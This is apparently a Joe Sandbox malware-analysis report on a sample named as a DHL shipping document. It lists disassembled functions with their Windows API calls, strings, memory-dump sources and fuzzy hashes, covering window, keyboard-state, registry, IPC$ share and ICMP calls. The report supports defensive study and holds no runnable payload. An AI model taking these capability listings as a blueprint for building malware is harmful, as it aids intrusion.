Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Library$EnumFree$AddressCloseDeleteLoadOpenProc
String ID: RegDeleteKeyExW$advapi32.dll
API String ID: 2734957052-4033151799
Opcode ID: 33dfd53b0f9f20fcb2fc340df5d9b6c30200ccb970d5b046a10299411caf4655
Instruction ID: 65dce5a3101846f573bd250dd2fd63110a448a4e3d3bce01931e5d1fd2c93db6
Opcode Fuzzy Hash: 33dfd53b0f9f20fcb2fc340df5d9b6c30200ccb970d5b046a10299411caf4655
Instruction Fuzzy Hash: 163180B5A12129BBD7218F54DC8CEFFBB7CEF06750F200565B909E2240DA749A45DBA0

Function 00223D1E Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00223D40
_wcslen.LIBCMT ref: 00223D6D
CreateDirectoryW.KERNEL32(?,00000000), ref: 00223D9D
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00223DBE
RemoveDirectoryW.KERNEL32(?), ref: 00223DCE
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00223E55
CloseHandle.KERNEL32(00000000), ref: 00223E60
CloseHandle.KERNEL32(00000000), ref: 00223E6B

Strings

:, xrefs: 00223D82
\, xrefs: 00223D77
\??\%s, xrefs: 00223D5B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 6357109bb0ded9e46af23d4fbfb1ae3cbb58556b4d0d833ac3260290665eaac1
Instruction ID: 7e908bb8b8546c042ee9ba8c5e55d0c1f356d459e84fe9e00ee27c2c473a2a36
Opcode Fuzzy Hash: 6357109bb0ded9e46af23d4fbfb1ae3cbb58556b4d0d833ac3260290665eaac1
Instruction Fuzzy Hash: 8031A376A1011ABBDB20DFA4EC49FEB37BCEF89700F1041A5F509D6150E77497548B24

Function 0021E6B0 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 72sleepwindowtimeCOMMON

Download Yara Rule

APIs

timeGetTime.WINMM ref: 0021E6B4

Part of subcall function 001CE551: timeGetTime.WINMM(?,?,0021E6D4), ref: 001CE555

Sleep.KERNEL32(0000000A), ref: 0021E6E1
EnumThreadWindows.USER32(?,Function_0006E665,00000000), ref: 0021E705
FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 0021E727
SetActiveWindow.USER32 ref: 0021E746
SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 0021E754
SendMessageW.USER32(00000010,00000000,00000000), ref: 0021E773
Sleep.KERNEL32(000000FA), ref: 0021E77E
IsWindow.USER32 ref: 0021E78A
EndDialog.USER32(00000000), ref: 0021E79B

Strings

BUTTON, xrefs: 0021E719

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
String ID: BUTTON
API String ID: 1194449130-3405671355
Opcode ID: 3703bdfe342d855166d4a78aff78a403ba1d3db4de63bcc4d09b1365a6755b28
Instruction ID: c4d0492fa75bc82b517ab2e046fa09a7e75b892ac5e3e138c9294d627f24f854
Opcode Fuzzy Hash: 3703bdfe342d855166d4a78aff78a403ba1d3db4de63bcc4d09b1365a6755b28
Instruction Fuzzy Hash: B121D4B8212251EFFF005F24FC8DE667BEDF7A6349B254424FC05811A1EB719C648B10

Function 0021E9FC Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 71COMMON

Download Yara Rule

APIs

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 0021EA5D
mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 0021EA73
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0021EA84
mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 0021EA96
mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 0021EAA7

Strings

status PlayMe mode, xrefs: 0021EA58
play PlayMe, xrefs: 0021EAA2
open , xrefs: 0021EA0C
close PlayMe, xrefs: 0021EA6E, 0021EA9B
alias PlayMe, xrefs: 0021EA36
play PlayMe wait, xrefs: 0021EA91

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: SendString$_wcslen
String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
API String ID: 2420728520-1007645807
Opcode ID: 26cfd613d941e71360c97cb4dbafb6c3e3b77fcbbcb1dd5cf7015aab6429856d
Instruction ID: 631b575a2fac57cda5917ce7e49edd5b58daecb68e4aedc4eaf31793fcb71afc
Opcode Fuzzy Hash: 26cfd613d941e71360c97cb4dbafb6c3e3b77fcbbcb1dd5cf7015aab6429856d
Instruction Fuzzy Hash: B6117731A6025979D710A761DC4EDFF6EBCEFE2F00F444425B915A20D1DF700955C5B0

Function 00215CC6 Relevance: 18.2, APIs: 12, Instructions: 173COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,00000001), ref: 00215CE2
GetWindowRect.USER32(00000000,?), ref: 00215CFB
MoveWindow.USER32(?,0000000A,00000004,?,?,00000004,00000000), ref: 00215D59
GetDlgItem.USER32(?,00000002), ref: 00215D69
GetWindowRect.USER32(00000000,?), ref: 00215D7B
MoveWindow.USER32(?,?,00000004,00000000,?,00000004,00000000), ref: 00215DCF
GetDlgItem.USER32(?,000003E9), ref: 00215DDD
GetWindowRect.USER32(00000000,?), ref: 00215DEF
MoveWindow.USER32(?,0000000A,00000000,?,00000004,00000000), ref: 00215E31
GetDlgItem.USER32(?,000003EA), ref: 00215E44
MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 00215E5A
InvalidateRect.USER32(?,00000000,00000001), ref: 00215E67

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$ItemMoveRect$Invalidate
String ID:
API String ID: 3096461208-0
Opcode ID: d2975d5b33af116177e693d82738ec977d226f35c83a6df01880e3627213db93
Instruction ID: 2c20c6b3ea160d03886374d2e626c81285dbfe1e255b7cdc9ad5696c20d4bb5e
Opcode Fuzzy Hash: d2975d5b33af116177e693d82738ec977d226f35c83a6df01880e3627213db93
Instruction Fuzzy Hash: 58514E74B10615AFDF18CF68DD89AAEBBF9FB98300F208128F905E6290D7709E50CB50

Function 002450D4 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 162windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00002001,00000000,00000000), ref: 00245186
ShowWindow.USER32(?,00000000), ref: 002451C7
ShowWindow.USER32(?,00000005,?,00000000), ref: 002451CD
SetFocus.USER32(?,?,00000005,?,00000000), ref: 002451D1

Part of subcall function 00246FBA: DeleteObject.GDI32(00000000), ref: 00246FE6

GetWindowLongW.USER32(?,000000F0), ref: 0024520D
SetWindowLongW.USER32(?,000000F0,00000000), ref: 0024521A
InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0024524D
SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00245287
SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00245296

Strings

8], xrefs: 00245104

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
String ID: 8]
API String ID: 3210457359-438778366
Opcode ID: 5f53657279bce1545cc74510cac553a5ef139d41ec658ed117ea850a1f4a39a6
Instruction ID: 3fd3372c7f3bc35e78e2e369ee3ccb4151081684f5a2983a7fd202c0c8182aad
Opcode Fuzzy Hash: 5f53657279bce1545cc74510cac553a5ef139d41ec658ed117ea850a1f4a39a6
Instruction Fuzzy Hash: D351C434A71A29BFEF289F24CC49BD93B65FB05321F144012F99D962E2C3B599A0DF41

Function 002196E2 Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,?,?,001FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?), ref: 00219717
LoadStringW.USER32(00000000,?,001FF7F8,00000001), ref: 00219720

Part of subcall function 001B9CB3: _wcslen.LIBCMT ref: 001B9CBD

GetModuleHandleW.KERNEL32(00000000,00000001,?,00000FFF,?,?,001FF7F8,00000001,0000138C,00000001,?,00000001,00000000,?,?,00000000), ref: 00219742
LoadStringW.USER32(00000000,?,001FF7F8,00000001), ref: 00219745
MessageBoxW.USER32(00000000,00000000,?,00011010), ref: 00219866

Strings

^ ERROR, xrefs: 002197FB
Error: , xrefs: 0021981D
%s (%d) : ==> %s: %s %s, xrefs: 0021984A
Line %d:, xrefs: 002197A0
Line %d (File "%s"):, xrefs: 0021978F

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: HandleLoadModuleString$Message_wcslen
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 747408836-2268648507
Opcode ID: db48ddd27a4edd04c4b3370c9d5e8f47e227fdfc709de9b62baaa103d229a98e
Instruction ID: 54a24c927cc19622da41b2337615a56603653c4a86a9a489c799ff4e1c25e7f1
Opcode Fuzzy Hash: db48ddd27a4edd04c4b3370c9d5e8f47e227fdfc709de9b62baaa103d229a98e
Instruction Fuzzy Hash: 22414172800219ABCF14EBE4DD96DEEB7B8AF65340F600065F60572092EB356F99CF61

Function 002106DE Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 127registryshareCOMMON

Download Yara Rule

APIs

Part of subcall function 001B6B57: _wcslen.LIBCMT ref: 001B6B6A

WNetAddConnection2W.MPR(?,?,?,00000000), ref: 002107A2
RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 002107BE
RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 002107DA
RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 00210804
CLSIDFromString.OLE32(?,000001FE,?,SOFTWARE\Classes\), ref: 0021082C
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 00210837
RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0021083C

Strings

SOFTWARE\Classes\, xrefs: 0021070E
\IPC$, xrefs: 00210784
\CLSID, xrefs: 00210724

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_wcslen
String ID: SOFTWARE\Classes\$\CLSID$\IPC$
API String ID: 323675364-22481851
Opcode ID: c10ca84b372e2e051e82e213f266640f46f3367828c975ea1dadc688f8c6d453
Instruction ID: 50cf0ef6218cf9e30ae553eeecf21418d05a3bec939d1e21c573ee41ddf98941
Opcode Fuzzy Hash: c10ca84b372e2e051e82e213f266640f46f3367828c975ea1dadc688f8c6d453
Instruction Fuzzy Hash: 65413876C10229ABDF11EFA4DC85CEEB7B8BF24340B544129E901A71A0EB709E54CB90

Function 00243C46 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 101windowCOMMON

Download Yara Rule

APIs

CreateMenu.USER32 ref: 00243C79
SetMenu.USER32(?,00000000), ref: 00243C88
GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00243D10
IsMenu.USER32(?), ref: 00243D24
CreatePopupMenu.USER32 ref: 00243D2E
InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00243D5B
DrawMenuBar.USER32 ref: 00243D63

Strings

8], xrefs: 00243CCF, 00243CEC
0, xrefs: 00243C54
F, xrefs: 00243D4E

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Menu$CreateItem$DrawInfoInsertPopup
String ID: 0$8]$F
API String ID: 161812096-3537645134
Opcode ID: 51989aeceb97df82235fc567191f519821ebe651df95218eb3ef0dba5e565c45
Instruction ID: ba0b167bfed50184ae3caf1ffc377cdbc6af0f3444983347927d3efbdd309e7a
Opcode Fuzzy Hash: 51989aeceb97df82235fc567191f519821ebe651df95218eb3ef0dba5e565c45
Instruction Fuzzy Hash: 91417F79A12606EFDB18CF54E848ADE77B5FF49350F140029F956A7360D770AA20CF50

Function 00233C30 Relevance: 16.8, APIs: 11, Instructions: 344fileCOMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00233C5C
CoInitialize.OLE32(00000000), ref: 00233C8A
CoUninitialize.OLE32 ref: 00233C94
_wcslen.LIBCMT ref: 00233D2D
GetRunningObjectTable.OLE32(00000000,?), ref: 00233DB1
SetErrorMode.KERNEL32(00000001,00000029), ref: 00233ED5
CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,?), ref: 00233F0E
CoGetObject.OLE32(?,00000000,0024FB98,?), ref: 00233F2D
SetErrorMode.KERNEL32(00000000), ref: 00233F40
SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00233FC4
VariantClear.OLEAUT32(?), ref: 00233FD8

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize_wcslen
String ID:
API String ID: 429561992-0
Opcode ID: 68c8a46cd9600ccd1d3bb811b45e89f97b6a99c5b386a729646f59971f061336
Instruction ID: 1ddfb7c801ae78a155f84695929ee35e17b351769c74e92898e0b9d2306a0768
Opcode Fuzzy Hash: 68c8a46cd9600ccd1d3bb811b45e89f97b6a99c5b386a729646f59971f061336
Instruction Fuzzy Hash: 24C166B16183059FD700DF68C88496BBBE9FF89748F10491DF98A9B220D770EE15CB52

Function 00227A96 Relevance: 16.8, APIs: 11, Instructions: 298comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00227AF3
SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 00227B8F
SHGetDesktopFolder.SHELL32(?), ref: 00227BA3
CoCreateInstance.OLE32(0024FD08,00000000,00000001,00276E6C,?), ref: 00227BEF
SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 00227C74
CoTaskMemFree.OLE32(?,?), ref: 00227CCC
SHBrowseForFolderW.SHELL32(?), ref: 00227D57
SHGetPathFromIDListW.SHELL32(00000000,?), ref: 00227D7A
CoTaskMemFree.OLE32(00000000), ref: 00227D81
CoTaskMemFree.OLE32(00000000), ref: 00227DD6
CoUninitialize.OLE32 ref: 00227DDC

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize
String ID:
API String ID: 2762341140-0
Opcode ID: 7281b28f8320ae23d9543d232ebf8773f1b83e8cc99f5a692b7ac39e61b0dbfc
Instruction ID: cd001a73c38ea2e1797249d16a38ebc827d21094ce167b8652bfd952f4626254
Opcode Fuzzy Hash: 7281b28f8320ae23d9543d232ebf8773f1b83e8cc99f5a692b7ac39e61b0dbfc
Instruction Fuzzy Hash: A9C11B75A14119AFCB14DFA4D888DAEBBF9FF48304B148499F81A9B261D730ED41CB90

Function 0020FA88 Relevance: 16.6, APIs: 11, Instructions: 122memoryCOMMON

Download Yara Rule

APIs

SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 0020FAAF
SafeArrayAllocData.OLEAUT32(?), ref: 0020FB08
VariantInit.OLEAUT32(?), ref: 0020FB1A
SafeArrayAccessData.OLEAUT32(?,?), ref: 0020FB3A
VariantCopy.OLEAUT32(?,?), ref: 0020FB8D
SafeArrayUnaccessData.OLEAUT32(?), ref: 0020FBA1
VariantClear.OLEAUT32(?), ref: 0020FBB6
SafeArrayDestroyData.OLEAUT32(?), ref: 0020FBC3
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0020FBCC
VariantClear.OLEAUT32(?), ref: 0020FBDE
SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0020FBE9

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
String ID:
API String ID: 2706829360-0
Opcode ID: a5d9b8c03863fbd4243f8919359c783288f565899c6836beda65ad28c1f71176
Instruction ID: ad3150d60a9b3957c5b598f33dd8ad57e55c5a23e1110fe32b471436d110531d
Opcode Fuzzy Hash: a5d9b8c03863fbd4243f8919359c783288f565899c6836beda65ad28c1f71176
Instruction Fuzzy Hash: CA418F34A10219DFCB50DFA8D9589AEBBB9EF08344F108069E905A7262DB30E945CFA0

Function 00219C79 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON

Download Yara Rule

APIs

GetKeyboardState.USER32(?), ref: 00219CA1
GetAsyncKeyState.USER32(000000A0), ref: 00219D22
GetKeyState.USER32(000000A0), ref: 00219D3D
GetAsyncKeyState.USER32(000000A1), ref: 00219D57
GetKeyState.USER32(000000A1), ref: 00219D6C
GetAsyncKeyState.USER32(00000011), ref: 00219D84
GetKeyState.USER32(00000011), ref: 00219D96
GetAsyncKeyState.USER32(00000012), ref: 00219DAE
GetKeyState.USER32(00000012), ref: 00219DC0
GetAsyncKeyState.USER32(0000005B), ref: 00219DD8
GetKeyState.USER32(0000005B), ref: 00219DEA

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: State$Async$Keyboard
String ID:
API String ID: 541375521-0
Opcode ID: ab7ef7fc3893c492ee78a0c32f8ee01a9bac2f37495dec1002e4b04ec5c98707
Instruction ID: 5d93aa0374ed999909f105a1460034625b23b274c3413fc7236f3049a05f97ad
Opcode Fuzzy Hash: ab7ef7fc3893c492ee78a0c32f8ee01a9bac2f37495dec1002e4b04ec5c98707
Instruction Fuzzy Hash: B34108346147CB69FF309F64D4243F5BEE0AB36304F48805ADAC6561C2D7A599E4C7A2

Function 0023055B Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 207networkfileCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 002305BC
inet_addr.WSOCK32(?), ref: 0023061C
gethostbyname.WSOCK32(?), ref: 00230628
IcmpCreateFile.IPHLPAPI ref: 00230636
IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 002306C6
IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 002306E5
IcmpCloseHandle.IPHLPAPI(?), ref: 002307B9
WSACleanup.WSOCK32 ref: 002307BF

Strings

Ping, xrefs: 00230676

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659452562.0000000000284000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1b0000_DHL DOCS 2-0106-25.jbxd

Similarity

API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
String ID: Ping
API String ID: 1028309954-2246546115
Opcode ID: 32b30222b074a3d38bbe81ce00538dd704e5aae1838cf02f466afd00601bfef6
Instruction ID: 950d2d4d89f9f151f47e2a4cbdf0ae918df4518ff86bf8680329cca60bc01013
Opcode Fuzzy Hash: 32b30222b074a3d38bbe81ce00538dd704e5aae1838cf02f466afd00601bfef6
Instruction Fuzzy Hash: E2919EB56142029FD320DF19D4D9F1ABBE4BF44318F1485A9F46A8B6A2C770EC51CFA1

Function 00238CD3 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 193COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,00000000,?), ref: 00238CF3

Part of subcall function 00218E54: _wcslen.LIBCMT ref: 00218E77

_wcslen.LIBCMT ref: 00238D4E
_wcslen.LIBCMT ref: 00238D9C
_wcslen.LIBCMT ref: 00238DDC
_wcslen.LIBCMT ref: 00238E6E

Strings

stdcall, xrefs: 00238DD6, 00238DDB
none, xrefs: 00238E65, 00238E6A
cdecl, xrefs: 00238D48, 00238D4D
winapi, xrefs: 00238D96, 00238D9B

Memory Dump Source

Source File: 00000000.00000002.1659291241.00000000001B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001B0000, based on PE: true

Associated: 00000000.00000002.1659238014.00000000001B0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.000000000024C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659335166.0000000000272000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1659385773.000000000027C000.00000004.00000001.01000000.00000003.sdmpDownload File
